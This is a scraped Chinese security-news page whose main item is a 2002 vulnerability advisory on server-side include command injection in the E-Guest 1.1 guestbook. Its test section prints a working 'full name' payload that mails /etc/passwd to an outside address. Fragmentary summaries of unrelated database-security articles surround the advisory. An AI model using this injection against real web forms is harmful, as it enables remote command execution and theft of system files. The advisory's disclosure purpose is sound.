摘要:1)、新建aaa用户如图17,新建登录后出现图18界面,输入用户名aaa,在输入个强壮的密码。 560)this.style.width=560; onmousewheel = javascript:return big(this) src="/files/uploadimg/20050824/1629320.gif">图17 560)this.style.width=560; onmousewh......
摘要:由于多种原因,进行安全设置的人们常常不理解数据的真正价值,所以,他们也无法对数据进行合适的保护。将你的数据只限于需要的人访问,并保证访问的人的合法性,是一个数据库管理人员的重要工作。然而,确保数据可以访问不是意味着数据向所有人公开,相反的,你必须很仔细地保护数据,并只对需要使用数据的人进行开放。设置安全性过程通用的软件维护和数据库更新都会对系统安全起着重要作用,通常包括以下步骤:分配一个可靠的密码......
E-Guest服务器端包含可远程执行任意命令漏洞 【程序编程相关:
阿尔卡特全球IPTV商用案例】 【推荐阅读:
IPTV市场研究与策略分析报告(2005】
信息提供: 【扩展信息:MPEG系列标准及其应用】
安全公告(或线索)提供热线:51cto.editor@gmail.com
漏洞类别:
远程执行任意命令漏洞
攻击类型:
远程攻击
发布日期:
2002-06-30
更新日期:
2002-07-09
受影响系统:
leung eric e-guest 1.1
安全系统:
无
漏洞报告人:
downbload
漏洞描述:
bugtraq id: 5129
e-guest是一款免费开放源代码的留言版程序,可使用在unix与linux操作系统下. e-guest对用户提交到留言本名字的输入缺少正确的过滤,远程攻击者可以利用这个漏洞在目标系统上以e-guest进程的权限执行任意命令. e-guest对用户提交给留言本名字"full name"字段的数据缺少正确检查,远程攻击者可以通过服务器端包含来提交shell命令,导致攻击者可以以e-guest进程的权限在系统上执行任意命令.
测试方法:
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负!
full name: hi<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-
-> e-mail: downbload@hotmail.com homepage: uin: location: beyond the light ...
下一页 摘要:数据库是电子商务、金融以及erp系统的基础,通常都保存着重要的商业伙伴和客户信息。大多数企业、组织以及政府部门的电子数据都保存在各种数据库中,他们用这些数据库保存一些个人资料,比如员工薪水、个人资料等等。数据库服务器还掌握着敏感的金融数据。包括交易记录、商业事务和帐号数据,战略上的或者专业的信息,比如专利和工程数据,甚至市场计划等等应该保护起来防止竞争者和其他非法者获取的资料。数据完整性和合法存取......
